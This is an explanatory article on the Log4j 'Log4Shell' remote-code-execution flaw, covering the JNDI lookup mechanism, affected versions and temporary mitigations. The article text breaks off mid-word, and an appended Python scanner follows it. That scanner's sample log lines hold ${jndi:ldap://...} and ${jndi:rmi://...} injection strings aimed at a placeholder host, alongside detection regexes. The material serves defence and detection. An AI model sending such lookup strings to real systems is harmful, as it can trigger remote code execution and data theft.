Attackers continue to exploit the flaw in Log4J

There has been a great deal of discussion on the web about the vulnerability in Log4J that allows an attacker to trigger remote execution of arbitrary code if data can be sent to an application that uses the log4j library to log events.

This attack can be carried out without authentication, for example by using a login page that logs authentication errors.

This flaw has prompted cybersecurity companies to take action, and it appears that the threats exploiting this vulnerability are growing rapidly.

Members of the Apache Software Foundation have produced a patch that fixes the vulnerability, released as version 2.15.0, and possible workarounds have also been identified to reduce the risk.

What is Apache Log4j? How serious is the problem?

For those who do not yet know how serious the problem is, let me tell you: on December 9, a vulnerability was discovered in the Apache Log4j logging library.

This library is very widely used in Java/J2EE application development projects as well as in standard Java/J2EE-based software solutions.

Log4j includes a lookup mechanism that can be used to perform queries through a special syntax in a format string. For example, it can be used to request various parameters such as the Java environment version via ${java:version}, etc.

When the jndi key is specified in the string, the lookup mechanism uses the JNDI API. By default, all requests are made with the prefix java:comp/env/*; however, the authors implemented the option of using a custom protocol by placing a colon in the key.

This is where the vulnerability lies: if jndi:ldap:// is used as the key, the request goes to the specified LDAP server. Other communication protocols such as LDAPS, DNS and RMI can also be used.

As a result, a remote server controlled by the attacker can return an object to the vulnerable server, which can lead to arbitrary code execution on the system or to the leakage of confidential data.

All the attacker has to do is send a special string through any mechanism that writes this string to a log file and is handled by the Log4j library.

This can be done with simple HTTP requests, for example those sent through web forms, data fields, etc., or with any other type of interaction that uses server-side logging.

Tenable described the vulnerability as "the most critical vulnerability of the last decade."

A proof of concept has already been published. The vulnerability is now being actively exploited.

The severity of the vulnerability reaches the maximum score of 10 on the CVSS scale.

Here is the list of affected systems:

  • Apache Log4j versions 2.0 to 2.14.1
  • Apache Log4j versions 1.x (legacy versions), depending on specific configuration.
  • Products that use a vulnerable version of Apache Log4j - the European CERTs maintain a list of all such products and their vulnerability status.

CERT-FR recommends a thorough analysis of network logs. The following patterns can be used to identify attempts to exploit this vulnerability when they appear in URLs or in certain HTTP headers such as the user agent.

Finally, it is worth mentioning that it is recommended to move to log4j version 2.15.0 as soon as possible.

However, if it is difficult to migrate to this version, the following solutions can be used temporarily:

For applications using version 2.7.0 or later of the log4j library, it is possible to protect against any attack by changing the format of the events to be logged with the syntax %m{nolookups} for the data that the user may provide.

This change requires modifying the log4j configuration file to create a new format. It therefore requires re-running the technical and functional validation procedures before deploying this new version.

For applications using version 2.10.0 or later of the log4j library, it is also possible to protect against any attack by changing the configuration parameter log4j2.formatMsgNoLo
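As an added example (not code from the original article or from the Log4j project), the two defender-side checks discussed above in Python: scanning web access logs for the ${jndi:<scheme>:} lookup in the request line, referer and user agent (the CERT-FR recommendation), and auditing a Log4j 2 PatternLayout string for a message converter that still lacks the {nolookups} option (the pre-2.15.0 workaround). The access-log lines and the placeholder.invalid host are constructed; %m, %msg and %message are Log4j 2's real message converter names.

```python
import re
from urllib.parse import unquote

# Protocols the article names as reachable through the jndi lookup key.
JNDI_SCHEMES = ("ldap", "ldaps", "dns", "rmi")

# ${jndi:<scheme>:...}, matched case-insensitively after URL-decoding.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(" + "|".join(JNDI_SCHEMES) + r")\s*:", re.IGNORECASE
)

# Apache/nginx combined log format: request line, then referer and user agent.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<request>[^"]*)" \d+ \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Log4j 2 PatternLayout message converters %m, %msg and %message with optional
# {options}; "nolookups" among the options is the workaround from the article.
MSG_CONV_RE = re.compile(r"%(?:message|msg|m)\b(\{[^}]*\})?")

# Constructed sample access-log lines (not real traffic); the host is a placeholder.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:01:03 +0000] "GET /login?user=%24%7Bjndi%3Aldap%3A%2F%2Fplaceholder.invalid%2Fa%7D HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:01:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${JNDI:RMI://placeholder.invalid/x}"',
]

def find_jndi_lookups(access_log_lines):
    """Return (line_no, field, scheme) for each logged field carrying a jndi lookup."""
    hits = []
    for no, line in enumerate(access_log_lines, start=1):
        m = ACCESS_RE.match(line)
        if not m:
            continue  # not combined format; a real scanner would count these
        for field in ("request", "referer", "ua"):
            # Decode once: the application logs the decoded value it received.
            hit = JNDI_RE.search(unquote(m.group(field)))
            if hit:
                hits.append((no, field, hit.group(1).lower()))
    return hits

def pattern_has_lookups_enabled(pattern):
    """True if any message converter in the PatternLayout still lacks {nolookups}."""
    return any(
        "nolookups" not in (m.group(1) or "").lower()
        for m in MSG_CONV_RE.finditer(pattern)
    )
```

Run find_jndi_lookups over the web server's access log and pattern_has_lookups_enabled over each PatternLayout in log4j2.xml; on the sample lines the second and third are flagged, in the request and user-agent fields respectively.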